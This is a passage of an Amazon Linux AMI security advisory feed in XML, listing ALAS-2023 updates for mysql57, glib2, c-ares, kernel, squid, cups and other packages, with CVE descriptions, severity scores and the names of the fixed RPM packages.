release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-static-8.21-7.9.amzn1.i686.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-devel-8.21-7.9.amzn1.i686.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-debuginfo-8.21-7.9.amzn1.i686.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-tools-8.21-7.9.amzn1.i686.rpm</filename></package><package name="pcre" version="8.21" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-8.21-7.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1768</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1768: important priority package update for mysql57</title><issued date="2023-06-07 23:52:00" /><updated date="2024-05-23 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-22007:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.7.41 and prior and 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
CVE-2023-21980:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Client programs). Supported versions that are affected are 5.7.41 and prior and 8.0.32 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H).
CVE-2023-21912:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 5.7.41 and prior and 8.0.30 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21912" title="" id="CVE-2023-21912" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21980" title="" id="CVE-2023-21980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22007" title="" id="CVE-2023-22007" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-test" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.42-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1769</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1769: medium priority package update for glib2</title><issued date="2023-06-07 23:52:00" /><updated date="2023-06-15 17:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8386:
PCRE before 8.38 mishandles the interaction of lookbehind assertions and mutually recursive subpatterns, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8386" title="" id="CVE-2015-8386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2-debuginfo" version="2.36.3" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.25.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.25.amzn1.x86_64.rpm</filename></package><package name="glib2" version="2.36.3" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.25.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.25.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.25.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.25.amzn1.noarch.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.25.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.25.amzn1.i686.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.25.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1770</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1770: important priority package update for c-ares</title><issued date="2023-06-21 19:11:00" /><updated date="2023-06-29 23:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-32067:
Denial of Service.
Attack Steps:
The target resolver sends a query
The attacker forges a malformed UDP packet with a length of 0 and returns them to the target resolver
The target resolver erroneously interprets the 0 length as a graceful shutdown of the connection. (this is only valid for TCP connections, UDP is connection-less)
Current resolution fails, DoS attack is achieved.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32067" title="" id="CVE-2023-32067" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="c-ares-debuginfo" version="1.17.2" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-debuginfo-1.17.2-1.9.amzn1.x86_64.rpm</filename></package><package name="c-ares-devel" version="1.17.2" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-devel-1.17.2-1.9.amzn1.x86_64.rpm</filename></package><package name="c-ares" version="1.17.2" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-1.17.2-1.9.amzn1.x86_64.rpm</filename></package><package name="c-ares" version="1.17.2" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-1.17.2-1.9.amzn1.i686.rpm</filename></package><package name="c-ares-debuginfo" version="1.17.2" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-debuginfo-1.17.2-1.9.amzn1.i686.rpm</filename></package><package name="c-ares-devel" version="1.17.2" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-devel-1.17.2-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1771</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1771: important priority package update for perl-HTTP-Tiny</title><issued date="2023-06-21 19:11:00" /><updated date="2023-06-30 00:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-31486:
HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31486" title="" id="CVE-2023-31486" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-HTTP-Tiny" version="0.033" release="3.7.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-HTTP-Tiny-0.033-3.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1772</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1772: medium priority package update for mod24_security</title><issued date="2023-06-21 19:11:00" /><updated date="2023-06-29 23:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48279:
In ModSecurity before 2.9.6 and 3.x before 3.0.8, HTTP multipart requests were incorrectly parsed and could bypass the Web Application Firewall. NOTE: this is related to CVE-2022-39956 but can be considered independent changes to the ModSecurity (C language) codebase.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48279" title="" id="CVE-2022-48279" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_security-debuginfo" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_security-debuginfo-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mod24_security" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_security-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mlogc24" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mlogc24-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mod24_security" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_security-2.8.0-5.28.amzn1.i686.rpm</filename></package><package name="mlogc24" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mlogc24-2.8.0-5.28.amzn1.i686.rpm</filename></package><package name="mod24_security-debuginfo" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_security-debuginfo-2.8.0-5.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1773</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1773: important priority package update for kernel</title><issued date="2023-06-21 19:11:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-0775:
A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free.
CVE-2023-34256:
An issue was discovered in the Linux kernel before 6.3.3. There is an out-of-bounds read in crc16 in lib/crc16.c when called from fs/ext4/super.c because ext4_group_desc_csum does not properly check an offset.
CVE-2023-3111:
A use after free vulnerability was found in prepare_to_relocate in fs/btrfs/relocation.c in btrfs in the Linux Kernel. This possible flaw can be triggered by calling btrfs_ioctl_balance() before calling btrfs_ioctl_defrag().
CVE-2023-28466:
do_tls_getsockopt in net/tls/tls_main.c in the Linux kernel through 6.2.6 lacks a lock_sock call, leading to a race condition (with a resultant use-after-free or NULL pointer dereference).
CVE-2023-2269:
A denial of service problem was found, due to a possible recursive locking scenario, resulting in a deadlock in table_clear in drivers/md/dm-ioctl.c in the Linux Kernel Device Mapper-Multipathing sub-component.
CVE-2022-34918:
A heap buffer overflow flaw was found in the Linux kernel's Netfilter subsystem in the way a user provides incorrect input of the NFT_DATA_VERDICT type. This flaw allows a local user to crash or potentially escalate their privileges on the system.
CVE-2022-2586:
A use-after-free flaw was found in nf_tables cross-table in the net/netfilter/nf_tables_api.c function in the Linux kernel. This flaw allows a local, privileged attacker to cause a use-after-free problem at the time of table deletion, possibly leading to local privilege escalation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586" title="" id="CVE-2022-2586" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34918" title="" id="CVE-2022-34918" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2269" title="" id="CVE-2023-2269" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28466" title="" id="CVE-2023-28466" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3111" title="" id="CVE-2023-3111" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34256" title="" id="CVE-2023-34256" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0775" title="" id="CVE-2024-0775" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.318-166.529.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1774</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1774: important priority package update for squid</title><issued date="2023-06-21 19:11:00" /><updated date="2023-06-29 23:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12526:
An issue was discovered in Squid before 4.9. URN response handling in Squid suffers from a heap-based buffer overflow. When receiving data from a remote server in response to an URN request, Squid fails to ensure that the response can fit within the buffer. This leads to attacker controlled data overflowing in the heap.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12526" title="" id="CVE-2019-12526" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-migration-script" version="3.5.20" release="17.49.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.49.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.49.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.49.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.49.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.49.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.49.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.49.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.49.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.49.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.49.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1775</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1775: medium priority package update for glib2</title><issued date="2023-06-21 19:11:00" /><updated date="2023-06-29 23:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8394:
PCRE before 8.38 mishandles the (?(<digits>) and (?(R<digits>) conditions, which allows remote attackers to cause a denial of service (integer overflow) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
CVE-2015-8390:
PCRE before 8.38 mishandles the [: and \ substrings in character classes, which allows remote attackers to cause a denial of service (uninitialized memory read) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
CVE-2015-5073:
Heap-based buffer overflow in the find_fixedlength function in pcre_compile.c in PCRE before 8.38 allows remote attackers to cause a denial of service (crash) or obtain sensitive information from heap memory and possibly bypass the ASLR protection mechanism via a crafted regular expression with an excess closing parenthesis.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5073" title="" id="CVE-2015-5073" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8390" title="" id="CVE-2015-8390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8394" title="" id="CVE-2015-8394" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2" version="2.36.3" release="5.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.26.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.26.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.26.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.26.amzn1.noarch.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.26.amzn1.x86_64.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.26.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.26.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.26.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.26.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.26.amzn1.i686.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.26.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.26.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.26.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1776</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1776: important priority package update for kernel</title><issued date="2023-06-27 23:45:00" /><updated date="2023-07-03 20:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1206:
An issue was found in the Linux kernel's IPv6 TCP connection tracking code, which could lead to high CPU usage with certain traffic patterns.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1206" title="" id="CVE-2023-1206" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.318-167.530.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.318-167.530.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.318" release="167.530.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.318-167.530.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1777</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1777: medium priority package update for cups</title><issued date="2023-07-05 21:44:00" /><updated date="2023-07-19 21:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-34241:
A vulnerability was found in CUPS. This issue occurs due to logging data of free memory to the logging service AFTER the connection has been closed, when it should have logged the data immediately before the connection closed, resulting in a use-after-free in cupsdAcceptClient() in scheduler/client.c
